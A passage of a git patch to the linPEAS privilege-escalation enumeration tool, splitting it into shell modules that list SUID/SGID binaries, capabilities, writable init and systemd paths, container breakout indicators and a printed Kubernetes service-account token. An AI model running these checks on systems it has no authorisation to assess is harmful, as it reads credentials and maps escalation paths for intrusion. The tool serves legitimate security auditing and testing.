From b5bb7242c95af3af7b22ab07a6c83c4ec5bdb67d Mon Sep 17 00:00:00 2001 From: carlospolop Date: Sat, 18 Dec 2021 14:48:01 -0500 Subject: [PATCH 1/5] separated linpeas --- CONTRIBUTING.md | 2 +- build_lists/sensitive_files.yaml | 17 + linPEAS/builder/linpeas_builder.py | 8 + .../linpeas_parts/available_software.sh | 39 + linPEAS/builder/linpeas_parts/container.sh | 95 + .../linpeas_parts/interesting_files.sh | 639 +++ .../{ => linpeas_parts}/linpeas_base.sh | 2317 +-------- .../linpeas_parts/network_information.sh | 176 + .../procs_crons_timers_srvcs_sockets.sh | 303 ++ .../linpeas_parts/software_information.sh | 553 +++ .../linpeas_parts/system_information.sh | 185 + .../linpeas_parts/users_information.sh | 226 + linPEAS/builder/src/linpeasBaseBuilder.py | 37 + linPEAS/builder/src/linpeasBuilder.py | 11 +- linPEAS/builder/src/yamlGlobals.py | 50 +- linPEAS/linpeas.sh | 4324 ++++++++--------- 16 files changed, 4484 insertions(+), 4498 deletions(-) create mode 100644 linPEAS/builder/linpeas_parts/available_software.sh create mode 100644 linPEAS/builder/linpeas_parts/container.sh create mode 100644 linPEAS/builder/linpeas_parts/interesting_files.sh rename linPEAS/builder/{ => linpeas_parts}/linpeas_base.sh (56%) create mode 100644 linPEAS/builder/linpeas_parts/network_information.sh create mode 100644 linPEAS/builder/linpeas_parts/procs_crons_timers_srvcs_sockets.sh create mode 100644 linPEAS/builder/linpeas_parts/software_information.sh create mode 100644 linPEAS/builder/linpeas_parts/system_information.sh create mode 100644 linPEAS/builder/linpeas_parts/users_information.sh create mode 100644 linPEAS/builder/src/linpeasBaseBuilder.py diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index ca9105a..b42abb6 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -13,7 +13,7 @@ If you want to **contribute adding the search of new files that can contain sens Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud. ## Specific LinPEAS additions -From the PEASS-ng release **linpeas is auto-build from [linpeas_base.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/linpeas_base.sh)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this file and create a PR to master**. +From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that willbe merged into linpeas.sh*. The new linpeas.sh script will be auto-generated in the PR. ## Specific WinPEAS additions diff --git a/build_lists/sensitive_files.yaml b/build_lists/sensitive_files.yaml index 7fd0282..b751bef 100644 --- a/build_lists/sensitive_files.yaml +++ b/build_lists/sensitive_files.yaml @@ -65,6 +65,8 @@ common_directory_folders: - /usr - /var +peas_checks: "peass{CHECKS}" + peas_extrasections_markup: "peass{EXTRA_SECTIONS}" peas_finds_markup: "peass{FINDS_HERE}" @@ -2395,6 +2397,21 @@ search: search_in: - common + - name: Jetty + value: + config: + auto_check: True + + files: + - name: "jetty-realm.properties" + value: + bad_regex: ".*" + remove_empty_lines: True + remove_regex: '^#' + type: f + search_in: + - common + - name: Wget value: config: diff --git a/linPEAS/builder/linpeas_builder.py b/linPEAS/builder/linpeas_builder.py index 181d76b..be16c29 100644 --- a/linPEAS/builder/linpeas_builder.py +++ b/linPEAS/builder/linpeas_builder.py @@ -1,5 +1,6 @@ from .src.peasLoaded import PEASLoaded from .src.linpeasBuilder import LinpeasBuilder +from .src.linpeasBaseBuilder import LinpeasBaseBuilder from .src.yamlGlobals import FINAL_LINPEAS_PATH import os @@ -7,7 +8,14 @@ import stat #python3 -m builder.linpeas_builder def main(): + # Load configuration ploaded = PEASLoaded() + + # Build temporary linpeas_base.sh file + lbasebuilder = LinpeasBaseBuilder() + lbasebuilder.build() + + # Build final linpeas.sh lbuilder = LinpeasBuilder(ploaded) lbuilder.build() lbuilder.write_linpeas(FINAL_LINPEAS_PATH) diff --git a/linPEAS/builder/linpeas_parts/available_software.sh b/linPEAS/builder/linpeas_parts/available_software.sh new file mode 100644 index 0000000..8da4d10 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/available_software.sh @@ -0,0 +1,39 @@ +########################################### +#---------) Available Software (----------# +########################################### + +#-- 1AS) Useful software +print_2title "Useful software" +command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null +echo "" + +#-- 2AS) Search for compilers +print_2title "Installed Compiler" +(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); +echo "" + +if [ "$(command -v pkg 2>/dev/null)" ]; then +print_2title "Vulnerable Packages" +pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" +echo "" +fi + +if [ "$(command -v brew 2>/dev/null)" ]; then +print_2title "Brew Installed Packages" +brew list +echo "" +fi + +if [ "$MACPEAS" ]; then +print_2title "Writable Installed Applications" +system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi +done + +system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi +done diff --git a/linPEAS/builder/linpeas_parts/container.sh b/linPEAS/builder/linpeas_parts/container.sh new file mode 100644 index 0000000..d249e3a --- /dev/null +++ b/linPEAS/builder/linpeas_parts/container.sh @@ -0,0 +1,95 @@ +############################################## +#---------------) Containers (---------------# +############################################## +containerCheck + +print_2title "Container related tools present" +command -v "$CONTAINER_CMDS" + +print_2title "Container details" +print_list "Is this a container? ...........$NC $containerType" + +print_list "Any running containers? ........ "$NC +# Get counts of running containers for each platform +dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) +podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) +lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) +rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) +if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then +echo_no +else +containerCounts="" +if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi +if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi +if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi +if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi +echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," +# List any running containers +if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi +if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi +if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi +if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi +fi + +#If docker +if echo "$containerType" | grep -qi "docker"; then +print_2title "Docker Container details" +inDockerGroup +print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," +print_list "Looking and enumerating Docker Sockets\n"$NC +enumerateDockerSockets +print_list "Docker version .................$NC$dockerVersion" +checkDockerVersionExploits +print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +if [ "$inContainer" ]; then + checkDockerRootless + print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," +fi +if df -h | grep docker; then + print_2title "Docker Overlays" + df -h | grep docker +fi +fi + +if [ "$inContainer" ]; then +echo "" +print_2title "Container & breakout enumeration" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" +print_list "Container ID ...................$NC $(cat /etc/hostname)" +if echo "$containerType" | grep -qi "docker"; then + print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" +fi +if echo "$containerType" | grep -qi "kubernetes"; then + print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" + print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" +fi + +checkContainerExploits +print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +echo "" + +print_2title "Container Capabilities" +capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" +echo "" + +print_2title "Privilege Mode" +if [ -x "$(command -v fdisk)" ]; then + if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," + else + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," + fi +else + echo_not_found +fi +echo "" + +print_2title "Interesting Files Mounted" +(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" +echo "" + +print_2title "Possible Entrypoints" +ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq +echo "" +fi diff --git a/linPEAS/builder/linpeas_parts/interesting_files.sh b/linPEAS/builder/linpeas_parts/interesting_files.sh new file mode 100644 index 0000000..d1bc7be --- /dev/null +++ b/linPEAS/builder/linpeas_parts/interesting_files.sh @@ -0,0 +1,639 @@ +########################################### +#----------) Interesting files (----------# +########################################### + +##-- IF) SUID +print_2title "SUID - Check easy privesc, exploits and write perms" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +if ! [ "$STRINGS" ]; then + echo_not_found "strings" +fi +if ! [ "$STRACE" ]; then + echo_not_found "strace" +fi +suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $suids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total"; then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo $s | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + fi + fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH + export LD_LIBRARY_PATH="" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH + echo "----------------------------------------------------------------------------------------" + echo "" + fi + fi + fi + fi + fi +done; +echo "" + + +##-- IF) SGID +print_2title "SGID" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $sgids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total";then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! [ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + fi + fi + fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf "$ITALIC" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf "$NC" + echo "" + fi + fi + fi + fi + fi +done; +echo "" + +##-- IF) Misconfigured ld.so +print_2title "Checking misconfigurations of ld.so" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" +printf $ITALIC"/etc/ld.so.conf\n"$NC; +cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" +cat /etc/ld.so.conf 2>/dev/null | while read l; do + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + for f in $fpath/*; do + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + done + fi +done +echo "" + +##-- IF) Capabilities +print_2title "Capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +echo "Current capabilities:" +(capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" +(cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" +echo "" +echo "Shell capabilities:" +(capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" +(cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" +echo "" +echo "Files with capabilities (limited to 50):" +getcap -r / 2>/dev/null | head -n 50 | while read cb; do + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break + fi + done + + if ! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," + fi + + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi +done +echo "" + +##-- IF) Users with capabilities +print_2title "Users with capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +if [ -f "/etc/security/capability.conf" ]; then + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +else echo_not_found "/etc/security/capability.conf" +fi +echo "" + +##-- IF) Files with ACLs +print_2title "Files with ACLs (limited to 50)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" +( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + +if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi +echo "" + +##-- IF) Files with ResourceFork +#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER +# print_2title "Files with ResourceFork" +# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" +# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" +#fi +#echo "" + +##-- IF) .sh files in PATH +print_2title ".sh files in path" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" +echo $PATH | tr ":" "\n" | while read d; do + for f in $(find "$d" -name "*.sh" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi + done +done +echo "" + +print_2title "Broken links in path" +echo $PATH | tr ":" "\n" | while read d; do + find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; +done +echo "" + + +if [ "$MACPEAS" ]; then + print_2title "Unsigned Applications" + macosNotSigned /System/Applications +fi + +##-- IF) Unexpected folders in / +print_2title "Unexpected in root" +if [ "$MACPEAS" ]; then + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +else + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +fi +echo "" + +##-- IF) Files (scripts) in /etc/profile.d/ +print_2title "Files (scripts) in /etc/profile.d/" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" +if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +fi +echo "" + + ##-- IF) Files (scripts) in /etc/init.d/ +print_2title "Permissions in init, init.d, systemd, and rc.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" +if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +fi +echo "" + +##-- IF) Hashes in passwd file +print_list "Hashes inside passwd file? ........... " +if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd 